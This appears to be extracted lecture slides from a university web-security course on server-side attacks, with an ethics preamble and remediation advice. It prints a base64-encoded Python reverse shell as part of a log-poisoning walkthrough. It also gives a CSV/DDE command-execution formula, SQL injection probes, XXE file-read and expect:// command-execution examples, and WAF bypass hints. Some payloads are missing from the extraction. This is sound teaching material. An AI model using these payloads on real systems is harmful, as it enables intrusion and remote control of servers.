A little more of Server Side Attacks
COMP6443 – Topic 3
A NOTE ON ETHICS / LEGALITY
UNSW hosting this course is an extremely important step forward.
We expect a high standard of professionalism from you, meaning:
Respect the property of others and the university
Always abide by the law and university regulations
Be considerate of others to ensure everyone has an equal learning experience
Always check that you have written permission before performing a security test on a system
SERVER-SIDE ~MAGIC~
Server Side Include
CSV Injection
REST API related vulnerabilities
XML related vulnerabilities
SSRF
This session will be demo-heavy – you’re all welcome to have a play, but *don’t* do anything which locks me or the other students out. The open environment *ends* if we break it.
SERVER-SIDE INCLUDE
main.php?p=shop
login.php
admin.php
shop.php
info.php
main.php?p=admin
login.php
admin.php
shop.php
info.php
What other languages are vulnerable to this?
What about templating engines? AngularJS?
SERVER-SIDE INCLUDE
Step 1: Brute force the location of the Apache HTTP Error Log
Step 2: Poison /var/log/httpd/error.log with
Step 3: ???
Step 4: Why yes, my cookie is indeed
cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNv
Y2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMC4wLjEiLDEy
MzQpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVw
MihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOycKCg==
SERVER-SIDE INCLUDE VARIANTS?
A:\
http://
gopher:// (and other non-HTTP)
\\blah\ (UNC path)
Localhost (other local names)
::1 (ipv6)
Local web services?
What ways can you refer to a file?
What OS are you on?
Do symlinks work? Alternate data streams? Can you upload an ADS?
What else?
/proc
/dev/tcp/blah/blah
$ADMIN
DIRECTORY TRAVERSAL
1.php?uid=abcd&rec=2
1.php?uid=abcd/..&rec=3.php%00
2.txt
3.txt
abcd
4.txt
2.php
3.php
Affects: All languages (functionality which loads data from a file, which talks about
Doable in Python / Ruby / ASP.NET but rare.
Frameworks can make your code *more* vulnerable to this (by implementing an equivalent of include().
Credits: kranko235
What is CSV?
Comma-Separated-Values
File extension: .csv
Flat files, defined for data only.
What data can we put in the file?
CSV Formula Injection
Cells beginning with = are interpreted as formulas by Excel (and other applications).
Formulas that hurt!
So why is this dangerous?
Formulas can be used for multiple kinds of malicious payloads, for example:
Create fake hyperlinks.
Use Excel DDE (Dynamic Data Exchange) to execute commands (Excel only).
=cmd|’ /C notepad’!’A1′
=cmd|’ /C notepad’!’A1′
What happens next?
and….
Remediations
Application exporting CSV files must sanitise the output!
The following characters are known to be dangerous:
= + – @
Cells beginning with these characters should have a single quote character (‘) inserted at the beginning.
This forces Excel to interpret the cell as text.
Make sure commas are removed from data!
Commas can be used to start a new cell, which then evades the single quote remediation above.
If a different delimiter other than commas is used, modify the remediation accordingly.
Webservices and API Security
All types of injection attacks
Broken function & object level authorisation
Excessive data exposure
Rate-limiting
Restricting insecure usage of HTTP methods
Leaking token, caching etc
Mass assignment
Security misconfiguration
https://github.com/srini0x00/securestore_restapis
SQLI IN REST APIS?
http://application/apiv3/Users/?req_id=1’ AND ‘1’ LIKE ‘1
http://application/apiv3/Users/?req_id=1’ AND ‘1’ LIKE ‘2
generally apis (ESPECIALLY APIs for mobile apps) have little if not no protection against SQLi. these are great targets for testing for SQLi.
Credits: https://pranavhivarekar.in/2015/06/21/dropboxs-critical-bug-app-having-only-access-to–app-folder–being-able-to-post-and-enumerate-files-inof-any-folder/
Broken function & object level authorisation
Insecure Direct Object Reference(IDOR)
https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/
Vulnerability which is generally found by attackers because the access controls of a specific functionality or an object are not defined properly in an application.
Read access/Data Exfiltration
Editing records
Privilege escalation
Account takeover.
Some other takeaways
Using INT vs UUIDs
POST vs GET
Cache headers
User access map
Permissions libraries
Edge cases
Not too many nested ifs
Look at the code logic when you are refactoring
XML 101
Way to serialize data in a way that is both human and machine readable
Was the standard before JSON for client server continuous interaction
Username: Hacker
Address: 123 fake st
Number: 041234567
EXTERNAL XML ENTITY ATTACKS
XML can use external entities. Like files, or system commands.
]>
XXE
The Parser often has the ability to read any file on the server
We can exploit this by asking the parser to include a local file, This is a form of LFI (Local File Inclusion)
Consider a login request to a server made with XML
Request
Incorrect Password for Joe Smith
Response
XXE
]>
Request
Incorrect Password for root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
…
Response
We can send our request with a system resource request in it
XXE VARIANTS
]>
]>
]>
]> (rare)
What else?
XXE – CODE EXEC (PHP)
$stream = fopen(“expect://ls”, “r”);
PHP (The absolute legend) Has a module called Expect that lets you run a command as if it was a file by using the expect protocol
If installed you can thus use XXE to get code execution
]>
Incorrect password for
root
bin
etc
var
adult_files
XXE Demo
XXE – JUST THE SURFACE
There are many ways to exploit a XML parser and get around any defenses
You can use DTD’s and entities to get past filters and nest payloads
You can use HTTP requests to send data to your own server
Etc.
tl;dr:
Disable External Entity processing
Don’t Use PHP
Don’t use XML
Most JSON Parsing Libraries are more secure*
* https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/
XXE – RELEVANT
Parser Exploits are very relevant
Something I missed: *Five years* after I started regularly demonstrating arbitrary code-exec with pyyaml's `load()` function at conferences around the world, it's got a CVE and the function's been renamed to 'danger_load()'. Yay!https://t.co/i3pTLsLREA pic.twitter.com/FhI1xlIUa3
— Tom Eastman (@tveastman) January 21, 2019
The internet moves rapidly and a lot of it still runs on XML
Furthermore developers forget to take things out and manage old code
If you prod around any site you will most likely find things you shouldn’t (be ethical tho)
Server-Side Request Forgery
SSRF – Attacker’s point of view
Tricking web application to make request to internal system behalf of attacker.
Typically works on URL based input by users. E.g. Image import function from URL.
Possible to use other URLs, e.g. file://, phar://, gopher://, data://and dict://
You can:
Enumerate internal/external services.
Exfiltrate data.
Abuse API calls.
Invoke Cloud Services APIs.
What is URI?
Uniform Resource Identifier defined in RFC-3986.
Used to specify a resource.
Example:
URL Parsing (Null Char)
Vulnerabilities in libs
SSRF – Demo
SSRF – Defense
Whitelisting domains.
Disable access to internal domains – Firewall/Network policies.
Network level restrictions.
Be aware that URL parsing is hard and could easily bypassed. So, never use it as the only defense.
Block access to cloud metadata services (eg: 169.254.169.254 for AWS)
TL;DR: WAFS (ESP. APPLIANCES)
WAF’s are good at:
Probing payloads
OR 1=1, OR 1=0
Known exploits
Known frameworks
Malware scanning
Handing out IP bans
WAF’s are not good at:
Custom payloads
SCript, scrIPt
Execution time trickery
OR 2=2
Anything logic-related
FINGERPRINTING WAFS
Find out what WAF is running, and look into if there are any publically known bypasses for it.
bonus points, there may be exploits in the WAF itself
RUNTIME APPLICATION SELF PROTECTION
A WAF IN API HOOK FORM
Do the right thing. Scamming executives is unethical.
READING MATERIAL (REFERENCE)
XXE further details and fundamentals
Pentester Lab: XXE
https://pentesterlab.com/exercises/play_xxe/course
Twitter XXE Writeup
https://hackerone.com/reports/248668
questions? slack / email / come talk to us
THANKS FOR LISTENING TO US RANT!